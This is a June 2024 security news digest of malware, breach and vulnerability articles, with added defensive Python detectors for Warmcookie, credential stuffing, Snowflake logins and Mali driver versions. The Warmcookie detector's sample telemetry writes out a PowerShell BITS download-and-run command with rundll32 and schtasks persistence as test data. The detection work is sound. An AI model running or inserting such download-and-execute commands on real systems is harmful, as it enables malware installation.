Daily Brief

Articles are listed below, each with a generated summary.

Total articles found: 12731

Checks for new stories every ~15 minutes

2024-06-11 16:18:49 thehackernews MISCELLANEOUS Cynet's Integrated Platform Boosts MSP Efficiency and Profits
Managed service providers (MSPs) are increasingly relied on for comprehensive cybersecurity services as threats escalate. Cynet's All-in-One Cybersecurity Platform bundles a range of security capabilities into a single system, simplifying the MSP tech stack: Extended Detection and Response (XDR), Endpoint Protection (EPP), Managed Detection and Response (MDR) and other tooling. Automation, plus support from Cynet's in-house team, CyOps, is pitched as cutting response times and manual intervention during incidents. Cynet cites its results in the recent MITRE ATT&CK Evaluations, where it reported 100% detection and analytic coverage without configuration changes, as its competitive edge. The vendor's argument is that the streamlined approach and broad coverage let MSPs raise profit margins while improving service quality, positioning them as top-tier providers and helping them expand their client base.
2024-06-11 15:22:28 bleepingcomputer MALWARE New 'Warmcookie' Malware Distributed Through Fake Job Offers
Elastic Security Labs has documented a new Windows backdoor, "Warmcookie," distributed through phishing emails posing as job offers. The lures are personalised with the recipient's name and current employer. Victims are led to download a JavaScript file; when run, it launches PowerShell, which fetches the Warmcookie DLL using BITS (Background Intelligent Transfer Service) and executes it. Once installed, the backdoor persists through a scheduled task that runs every ten minutes and checks in regularly with its command-and-control (C2) server. Its capabilities include host fingerprinting, collecting extensive information about the infected machine, screenshot capture, and deployment of additional payloads. Elastic's analysts warn that, although new, Warmcookie is under active development and poses a significant risk to corporate networks.
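The infection chain above (JavaScript in a script host, PowerShell pulling a DLL over BITS, the DLL launched via rundll32, then a scheduled task with a ten-minute interval) is easy to express as a process-tree detection. The following is an added example written for this brief, not Elastic's or the article's code; the event fields are modelled on Sysmon process-creation records, and every path, IP, task name and command line in the sample telemetry is constructed.

```python
"""Flag the Warmcookie-style delivery chain in process-creation telemetry.
Added example; field names follow Sysmon Event ID 1 by assumption, and all
sample events below are constructed, not real captures."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
BITS_RE = re.compile(r"start-bitstransfer|bitsadmin", re.I)
TASK_RE = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.I)

# Constructed sample telemetry (hypothetical paths, names and TEST-NET address).
SAMPLE = [
    ProcEvent(100, 10, r"C:\Program Files\Outlook\outlook.exe", "outlook.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\a\Downloads\Job_Offer.js"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c Import-Module BitsTransfer; "
              "Start-BitsTransfer -Source http://198.51.100.7/x.dll -Destination C:\\ProgramData\\x.dll; "
              "rundll32 C:\\ProgramData\\x.dll,Start"),
    ProcEvent(400, 300, r"C:\Windows\System32\rundll32.exe", r"rundll32 C:\ProgramData\x.dll,Start"),
    ProcEvent(500, 400, r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn Updater /tr "rundll32 C:\ProgramData\x.dll,Start" /sc minute /mo 10'),
    # Ordinary admin use of PowerShell: must not fire.
    ProcEvent(600, 50, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe Get-Process"),
]


def _ancestors(ev, by_pid):
    cur = by_pid.get(ev.ppid)
    while cur is not None:
        yield cur
        cur = by_pid.get(cur.ppid)


def _descendants(ev, children):
    stack = list(children.get(ev.pid, []))
    while stack:
        child = stack.pop()
        yield child
        stack.extend(children.get(child.pid, []))


def detect_warmcookie_chain(events):
    """Return one finding per PowerShell process that downloads via BITS and has a
    script host running a .js file above it; descendant stages are recorded too."""
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    findings = []
    for ps in events:
        if not ps.image.lower().endswith("powershell.exe") or not BITS_RE.search(ps.cmdline):
            continue
        js_parent = next((a for a in _ancestors(ps, by_pid)
                          if a.image.lower().endswith(SCRIPT_HOSTS) and ".js" in a.cmdline.lower()), None)
        if js_parent is None:
            continue
        stages = {"js_script_host", "powershell_bits_download"}
        for d in _descendants(ps, children):
            img = d.image.lower()
            if img.endswith("rundll32.exe") and ".dll" in d.cmdline.lower():
                stages.add("rundll32_dll_launch")
            m = TASK_RE.search(d.cmdline) if img.endswith("schtasks.exe") else None
            if m and int(m.group(1)) <= 10:
                stages.add("scheduled_task_short_interval")
        findings.append({"root_pid": js_parent.pid, "powershell_pid": ps.pid, "stages": sorted(stages)})
    return findings


if __name__ == "__main__":
    for f in detect_warmcookie_chain(SAMPLE):
        print(f)
```

The PowerShell-plus-BITS stage is the pivot because it is rare in normal user sessions; the script-host ancestor and the rundll32/schtasks descendants raise confidence rather than being required, so a variant that persists differently still surfaces with fewer stages listed.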
2024-06-11 14:36:20 thehackernews NATION STATE ACTIVITY Chinese SecShow Actor Engages in Global DNS Probing Activities
SecShow, a China-linked actor operating from the China Education and Research Network (CERNET), has been conducting DNS probing worldwide since June 2023. The probes target open resolvers; their purpose is unclear, though the results could support later malicious activity. The technique uses CERNET-hosted nameservers to identify open DNS resolvers and to observe how their responses are handled. Each query to the SecShow nameservers is answered with a different random IP address, and the probing traffic was unintentionally amplified by Palo Alto Networks' Cortex Xpanse, which resolved the probe names itself. Dataplane.org and Unit 42 had previously reported scanning by the same actor. The activity fits a pattern seen with another China-linked actor, Muddling Meerkat, whose DNS queries blend into global traffic. The SecShow nameservers stopped responding in mid-May 2024, ending this particular probing campaign.
2024-06-11 14:25:47 bleepingcomputer MALWARE TellYouThePass Ransomware Attacks Exploit PHP Vulnerability
TellYouThePass ransomware began exploiting CVE-2024-4577, a flaw affecting PHP running in CGI mode on Windows, less than 48 hours after fixes were released. Researchers observed the attackers using the flaw to drop webshells and then run the encryptor: an HTA file carrying VBScript loads the payload, a Windows executable, which encrypts files on the compromised server. The ransom note demands 0.1 BTC (roughly $6,700 at the time) for the decryption key. Over 450,000 internet-exposed PHP servers, concentrated in the U.S. and Germany, are potentially vulnerable, although only the subset running PHP as CGI on Windows is actually exploitable. Security firms saw publicly available exploit code weaponised almost immediately after disclosure and patch release, and victims in support forums report their sites being encrypted, underlining the campaign's reach across exposed servers.
2024-06-11 13:34:43 theregister DATA BREACH UK and Canada Investigate 23andMe's Massive Data Breach
The UK's Information Commissioner's Office and the Office of the Privacy Commissioner of Canada are jointly investigating the 23andMe data breach, which affected nearly 7 million users. The investigation will assess the harm to customers, the adequacy of the security measures in place, and the company's transparency with regulators. The breach went undetected for about five months and came to light only when stolen data appeared on Reddit, not through internal monitoring. Sensitive data, including genetic information, was accessed. The attackers used credential stuffing (passwords reused from other breaches) to log in to roughly 14,000 accounts and, through those, reached data on specific user groups they had targeted. The case has raised concerns about misuse of genetic data and companies' responsibility for safeguarding it. 23andMe has since enabled two-factor authentication by default for all users, a control that arrived only after the breach was identified, and has pledged to cooperate with the regulators; neither will comment further until the investigation concludes.
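Credential stuffing has a distinctive shape in authentication logs: one source tries many different accounts, each once or twice, with a small but non-zero success rate, whereas brute force hammers one account. The detector below is an added example written for this brief, not 23andMe's or the article's code; the log format, thresholds and every log line are constructed assumptions.

```python
"""Separate credential stuffing from brute force in authentication logs.
Added example; the log format and the sample events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta


def _constructed_log():
    """Build sample auth events; every line is constructed, not real data."""
    base = datetime(2023, 5, 1, 10, 0, 0)
    lines = []
    # One source trying 60 different accounts once each; three reused passwords work.
    for i in range(60):
        result = "success" if i in (7, 23, 41) else "fail"
        lines.append(f"{(base + timedelta(seconds=i)).isoformat()} 203.0.113.5 user{i:03d} {result}")
    # One source hammering a single account: brute force, not stuffing.
    for i in range(40):
        lines.append(f"{(base + timedelta(seconds=2 * i)).isoformat()} 198.51.100.9 alice fail")
    # A legitimate user who mistypes twice and then logs in.
    for i, result in enumerate(["fail", "fail", "success"]):
        lines.append(f"{(base + timedelta(minutes=i)).isoformat()} 192.0.2.33 carol {result}")
    return "\n".join(lines)


SAMPLE_LOG = _constructed_log()


def parse_log(text):
    """Lines look like '<iso-timestamp> <src_ip> <username> <success|fail>' (assumed format)."""
    events = []
    for line in text.strip().splitlines():
        ts, ip, user, result = line.split()
        events.append((datetime.fromisoformat(ts), ip, user, result == "success"))
    return events


def classify_sources(events, window=timedelta(minutes=10), min_attempts=20, stuffing_ratio=0.8):
    """Return {src_ip: verdict} for sources exceeding min_attempts inside a sliding window.
    One target account means brute force; a high ratio of distinct accounts to attempts
    means credential stuffing. Quiet sources are not reported."""
    per_ip = defaultdict(list)
    for ev in sorted(events):
        per_ip[ev[1]].append(ev)
    verdicts = {}
    for ip, evs in per_ip.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            chunk = evs[start:end + 1]
            if len(chunk) < min_attempts:
                continue
            users = {e[2] for e in chunk}
            label = None
            if len(users) == 1:
                label = "brute_force"
            elif len(users) / len(chunk) >= stuffing_ratio:
                label = "credential_stuffing"
            if label:
                verdicts[ip] = {
                    "label": label,
                    "attempts": len(evs),
                    "distinct_users": len({e[2] for e in evs}),
                    # Accounts the source actually got into: force a reset and revoke sessions.
                    "compromised": sorted({e[2] for e in evs if e[3]}),
                }
                break
    return verdicts


if __name__ == "__main__":
    for ip, verdict in classify_sources(parse_log(SAMPLE_LOG)).items():
        print(ip, verdict)
```

The "compromised" list is the actionable output: those accounts need a forced password reset and session revocation, which is what 23andMe's data-scraping incident turned on. Grouping by source IP alone misses stuffing spread across residential proxies; in practice the same ratio test is run per ASN or per client fingerprint as well.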
2024-06-11 12:48:16 bleepingcomputer DATA BREACH Pure Storage Confirms Customer Data Exposure After Snowflake Hack
Pure Storage confirmed that a threat actor gained unauthorised access to a Snowflake workspace holding telemetry data used for its proactive support services. The exposed data included customer names, LDAP usernames and email addresses; it did not include credentials for array access or any data stored on customer systems, and the incident did not touch broader customer infrastructure. Pure Storage says it has taken steps to prevent further unauthorised access. The incident is part of a wider campaign: Snowflake, Mandiant and CrowdStrike report that the attacker used stolen credentials to reach customer accounts lacking multi-factor authentication, with over 165 organisations potentially affected by the threat actor tracked as UNC5537. Many of the credentials were harvested by infostealer malware as far back as 2020, hence the emphasis on credential rotation and MFA.
2024-06-11 11:01:22 thehackernews MISCELLANEOUS Annual Report Unveils Top Network Vulnerabilities of 2024
Vonahi Security's annual report draws on more than 10,000 network pentests across over 1,200 organisations. The most common critical findings are name-resolution spoofing, specifically Multicast DNS (mDNS) and NetBIOS Name Service (NBNS) spoofing, outdated Windows systems, and exploitable Windows remote code execution (RCE) flaws such as BlueKeep and EternalBlue. IPMI authentication bypass and reuse of local administrator passwords across hosts were also prominent; each lets a single foothold spread widely. Dell EMC iDRAC controllers were found with CGI injection vulnerabilities that can let an attacker run commands as root. Most of these findings trace back to configuration weaknesses and patching gaps. The report argues for penetration testing more often than the conventional annual cycle so that such issues are caught and fixed promptly, and pitches Vonahi's vPenTest platform for automated, continuous network testing.
2024-06-11 10:15:20 thehackernews MISCELLANEOUS Apple Launches Private Cloud Compute with Enhanced AI Features
Apple introduced Private Cloud Compute (PCC), a cloud system for AI processing designed to preserve user privacy for requests that cannot run on the device. PCC underpins Apple Intelligence, the generative AI features in iOS 18, iPadOS 18 and macOS Sequoia, which combine on-device and cloud processing. Apple is also integrating ChatGPT into Siri and the systemwide Writing Tools, with users' IP addresses obscured and OpenAI not retaining requests. PCC nodes are custom-built servers on Apple silicon that reuse the platform's security foundations, including the Secure Enclave, Secure Boot and sandboxing. Requests are routed through Oblivious HTTP (OHTTP) relays operated by an independent third party, so Apple never sees the requesting device's IP address and cannot tie a request to a user. Apple will publish the software images that run on PCC nodes so that independent security researchers can inspect the code and verify the privacy claims. Alongside PCC, Apple announced new privacy controls: locking individual apps behind Face ID or Touch ID, a dedicated Passwords app, and a redesigned Privacy & Security section in Settings. Apple Intelligence will run only on newer hardware and, at launch, only with the device language set to U.S. English.
2024-06-11 08:53:39 thehackernews MALWARE Advanced ValleyRAT Malware Targets China and Japan with New Tactics
Researchers have identified an updated version of the ValleyRAT malware with new capabilities, including screenshot capture, process filtering and control over its own logging. The malware is attributed to a China-based threat actor and is being delivered through phishing campaigns against organisations in China and Japan, pointing to targeted espionage. Infection is multi-stage: a downloader retrieves components from an HTTP File Server (HFS), decrypts them to fetch further stages, and abuses a legitimate executable to sideload a malicious DLL, which establishes persistence and takes steps to evade anti-malware tools. The implant then injects shellcode into system processes to contact its command-and-control server and download the final payload. The findings arrive alongside other reports, including an updated Agent Tesla campaign aimed at Spanish speakers, illustrating how quickly both commodity and state-linked malware keep evolving. The practical takeaway is the need for robust endpoint controls and continuous monitoring, in particular for DLL sideloading and process injection, to limit the risk from such campaigns.
2024-06-11 06:56:07 thehackernews DATA BREACH Snowflake Data Breach Affects 165 Companies in Extortion Scheme
Mandiant, working with Snowflake, reports that around 165 customer accounts were affected by a campaign it attributes to UNC5537, a financially motivated group whose members operate primarily in North America with a collaborator in Turkey. The attackers used stolen credentials to log in, took data, then advertised it for sale and attempted to extort the victims. The intrusions succeeded because the affected accounts lacked multi-factor authentication, credentials had not been rotated in years, and there were no network allow lists restricting where logins could originate. The credentials came from infostealer infections (Lumma, MetaStealer, Raccoon, RedLine, RisePro and Vidar), frequently on contractor machines that were also used for personal and high-risk activity. Inside Snowflake, UNC5537 used a custom tool, FROSTBITE, for reconnaissance and the DBeaver Ultimate database client to query and pull data. Snowflake says it is developing a plan to require customers to adopt advanced controls such as MFA and is working closely with affected customers. The campaign shows the scale of risk created by infostealer credential theft and its commercialisation, which affects SaaS platforms well beyond Snowflake.
2024-06-11 06:40:07 thehackernews MALWARE Arm Confirms Zero-Day Exploit in Mali GPU, Urges Updates
Arm has disclosed CVE-2024-4610, a use-after-free in the Bifrost and Valhall GPU kernel drivers that it says is being actively exploited. A local, non-privileged user can trigger improper GPU memory processing and gain access to already freed memory. Affected releases are Bifrost and Valhall driver versions r34p0 through r40p0; the fix shipped in r41p0 in November 2022, and the current driver release is r49p0, published in April 2024. Arm has not published details of the in-the-wild exploitation. Earlier Mali GPU flaws have been chained in targeted spyware attacks by commercial surveillance vendors against Android devices. Users and device makers are urged to move to a fixed driver version and to keep monitoring for further updates.
2024-06-11 03:31:39 theregister CYBERCRIME Over 165 Snowflake Customer Accounts Compromised by Cybercriminals
Mandiant reports that a cybercriminal group it tracks as UNC5537 compromised data from around 165 Snowflake customer instances. The group has been speculatively linked to Scattered Spider (UNC3944), though that connection is not confirmed. The breaches trace back to compromised customer credentials, not to a breach of Snowflake's own corporate environment. Initial access came through Snowflake's web interface or command-line client using stolen credentials, some dating back to 2020. UNC5537 used a custom tool, FROSTBITE, for reconnaissance and then exfiltrated data; the compromised accounts generally lacked multi-factor authentication (MFA). Mandiant first identified the activity in April 2024, and the stolen data was being sold online by May. Many of the credentials were stolen from contractors using personal devices for work, a recurring weak point. Mandiant recommends enforcing MFA and rotating credentials regularly to prevent similar incidents.
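The three Snowflake items above (Pure Storage, the Mandiant report, and this one) come down to two questions an account owner can answer from login telemetry: which users are still completing password-only logins, and which successful logins came from an unexpected network or client. The following is an added example written for this brief, not Snowflake's, Mandiant's or the articles' code. The rows are constructed and shaped loosely like a join of the Snowflake ACCOUNT_USAGE login and session views; the column names, IP ranges, client identifiers, users and timestamps are all assumptions.

```python
"""Triage login records for the weaknesses UNC5537 exploited: no second factor,
no network restriction, unsanctioned database clients. Added example; the row
shape, trusted ranges, client allowlist and all rows are constructed."""
import ipaddress

TRUSTED_NETS = [ipaddress.ip_network("10.20.0.0/16")]    # assumed corporate egress / VPN range
ALLOWED_CLIENTS = {"SnowSQL", "PythonConnector", "JDBC"}  # assumed sanctioned client families

# Constructed rows (hypothetical users, addresses, clients and times).
ROWS = [
    {"event_timestamp": "2024-04-14T02:11:00", "user_name": "SVC_ETL", "client_ip": "203.0.113.77",
     "client_application_id": "DBeaver_DBeaverUltimate", "first_authentication_factor": "PASSWORD",
     "second_authentication_factor": None, "is_success": "YES"},
    {"event_timestamp": "2024-04-14T09:02:00", "user_name": "ALICE", "client_ip": "10.20.0.5",
     "client_application_id": "SnowSQL 1.2.24", "first_authentication_factor": "PASSWORD",
     "second_authentication_factor": "DUO_PUSH", "is_success": "YES"},
    {"event_timestamp": "2024-04-14T09:15:00", "user_name": "BOB", "client_ip": "10.20.0.9",
     "client_application_id": "PythonConnector 3.0.4", "first_authentication_factor": "PASSWORD",
     "second_authentication_factor": None, "is_success": "YES"},
    {"event_timestamp": "2024-04-14T09:20:00", "user_name": "DAVE", "client_ip": "10.20.0.3",
     "client_application_id": "PythonConnector 3.0.4", "first_authentication_factor": "RSA_KEYPAIR",
     "second_authentication_factor": None, "is_success": "YES"},
    {"event_timestamp": "2024-04-14T11:40:00", "user_name": "ALICE", "client_ip": "203.0.113.77",
     "client_application_id": "DBeaver_DBeaverUltimate", "first_authentication_factor": "PASSWORD",
     "second_authentication_factor": None, "is_success": "NO"},
]


def _client_family(app_id):
    """'DBeaver_DBeaverUltimate' -> 'DBeaver', 'SnowSQL 1.2.24' -> 'SnowSQL'."""
    return app_id.split(" ")[0].split("_")[0]


def triage_logins(rows, trusted_nets=TRUSTED_NETS, allowed_clients=ALLOWED_CLIENTS):
    """Return the MFA gap (users with successful password-only logins), alerts for
    risky successful logins, and failed attempts from untrusted networks."""
    mfa_gap, alerts, failed_untrusted = set(), [], []
    for r in rows:
        ip = ipaddress.ip_address(r["client_ip"])
        trusted = any(ip in net for net in trusted_nets)
        if r["is_success"] != "YES":
            if not trusted:
                failed_untrusted.append((r["user_name"], r["client_ip"]))
            continue
        # Key-pair auth has no second factor by design; only password-only logins count as the gap.
        password_only = (r["first_authentication_factor"] == "PASSWORD"
                         and not r["second_authentication_factor"])
        if password_only:
            mfa_gap.add(r["user_name"])
        reasons = []
        if password_only and not trusted:
            reasons.append("password_only_from_untrusted_network")
        if _client_family(r["client_application_id"]) not in allowed_clients:
            reasons.append("unexpected_client_app")
        if reasons:
            alerts.append((r["user_name"], r["client_ip"], reasons))
    return {"mfa_gap_users": sorted(mfa_gap), "alerts": alerts, "failed_untrusted": failed_untrusted}


if __name__ == "__main__":
    for key, value in triage_logins(ROWS).items():
        print(key, value)
```

The service account that logged in with a password from outside the trusted range using a desktop database client is the pattern Mandiant describes; the failed attempt against a second user from the same address is the follow-on signal to watch for. In a live account the same logic is a query over the ACCOUNT_USAGE views rather than a Python loop, and the fix for the MFA-gap list is a network policy plus enforced MFA or key-pair authentication for service accounts.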
2024-06-11 02:04:47 theregister CYBERCRIME Major Cyber Attack Disrupts Japanese Media Conglomerate Kadokawa
Kadokawa, the Japanese media conglomerate, suffered a major cyber attack that forced it to shut down several servers, including those behind the video-sharing site Niconico and the e-commerce service Ebiten. The attack was detected early on Saturday, June 8, and Kadokawa and its associated properties have now been offline for four days. The corporate site has been replaced with a temporary static HTML page, while Niconico remains offline and is being rebuilt from scratch. The investigation is at an early stage and the company has not yet characterised the nature of the attack. Niconico is Japan's second most popular video-sharing site, so the outage has hit both viewers and the content creators who rely on it for income. Ebiten cannot currently send order confirmation emails but says orders will still be fulfilled, suggesting some back-office functions are unaffected. Kadokawa has disclosed no further details and has given no timeline for full restoration of services.
2024-06-10 22:56:19 bleepingcomputer MALWARE Actively Exploited Vulnerability Identified in Arm GPU Drivers
Arm has reported a use-after-free (UAF) vulnerability, tracked as CVE-2024-4610, in its Bifrost and Valhall GPU kernel drivers, affecting versions r34p0 through r40p0. A local, non-privileged user can perform improper GPU memory processing operations to gain access to already freed memory, and Arm confirms the flaw is being exploited in the wild. The fix shipped in driver version r41p0 in November 2022; the latest release is r49p0. Because Arm supplies the driver to chip and device makers, who in turn depend on carriers to ship updates, patches can take a long time to reach end users. Bifrost and Valhall GPUs are found in a wide range of smartphones, tablets, Chromebooks and embedded systems, and some older devices will never receive the fix, leaving them exposed.
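Both Mali items above reduce to a version-range check against a device inventory: Bifrost or Valhall, and a driver release at or after r34p0 but before r41p0. The function below is an added example for this brief, not Arm's tooling; where the version string is read from (a vendor build property, dmesg, or a sysfs node) varies by device and is left as an assumption, and the inventory is constructed.

```python
"""Decide whether a Mali GPU kernel driver build falls in the CVE-2024-4610 range.
Added example; the affected families and versions are those stated in the brief,
the inventory is constructed, and how a host reports its version is an assumption."""
import re

AFFECTED_FAMILIES = {"bifrost", "valhall"}  # families named in the advisory summary
AFFECTED_FIRST = "r34p0"
FIXED_IN = "r41p0"


def parse_mali_version(text):
    """Turn 'r40p0' (case-insensitive, surrounding whitespace tolerated) into (40, 0)."""
    m = re.fullmatch(r"\s*r(\d+)p(\d+)\s*", text, re.I)
    if not m:
        raise ValueError(f"not a Mali kernel driver version: {text!r}")
    return int(m.group(1)), int(m.group(2))


def is_affected(family, version):
    """True for a Bifrost/Valhall build in [r34p0, r41p0); other families are not listed."""
    if family.strip().lower() not in AFFECTED_FAMILIES:
        return False
    v = parse_mali_version(version)
    return parse_mali_version(AFFECTED_FIRST) <= v < parse_mali_version(FIXED_IN)


def hosts_needing_update(inventory):
    """inventory: iterable of (hostname, gpu_family, driver_version).
    Unparseable versions are reported separately rather than silently treated as safe."""
    affected, unparsed = [], []
    for host, family, version in inventory:
        try:
            if is_affected(family, version):
                affected.append(host)
        except ValueError:
            unparsed.append(host)
    return {"affected": affected, "unparsed": unparsed}


# Constructed inventory (hypothetical hosts).
INVENTORY = [
    ("tablet-01", "Valhall", "r40p0"),   # last affected release
    ("tablet-02", "Valhall", "r41p0"),   # first fixed release
    ("phone-07", "Bifrost", "R34P0"),    # first affected release, odd casing
    ("phone-09", "Bifrost", "r33p0"),    # predates the affected range
    ("kiosk-03", "Valhall", "r49p0"),    # current release
    ("kiosk-04", "Valhall", "49.0"),     # vendor reported something else entirely
]

if __name__ == "__main__":
    print(hosts_needing_update(INVENTORY))
```

Tuple comparison does the ordering, so r9p0 versus r10p0 is handled correctly where a plain string compare would not be. The "unparsed" bucket matters in practice: a device that cannot report a recognisable driver version is usually one the OEM stopped updating, which is exactly the population the article warns may never get the fix.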
2024-06-10 22:25:36 bleepingcomputer CYBERCRIME GitHub Phishing Attacks Exploit Notifications for Extortion
GitHub users are being targeted by phishing emails that impersonate the platform's security and recruitment notifications. The attackers tag victims in manipulated comments or pull requests, which causes GitHub itself to send a genuine notification email carrying the lure. The linked phishing site poses as a GitHub careers page and asks the victim to authorise a malicious OAuth application, which grants the attacker access to private repositories and account data. Compromised accounts have had their repositories wiped and their owners locked out, with a note telling them to contact the attackers on Telegram to get the data back. GitHub says it has been aware of and responding to the campaign since February and advises users to report suspicious activity; reviewing the OAuth applications authorised on an account is the practical check. A similar campaign in September 2022 used fake CircleCI notifications to steal GitHub credentials.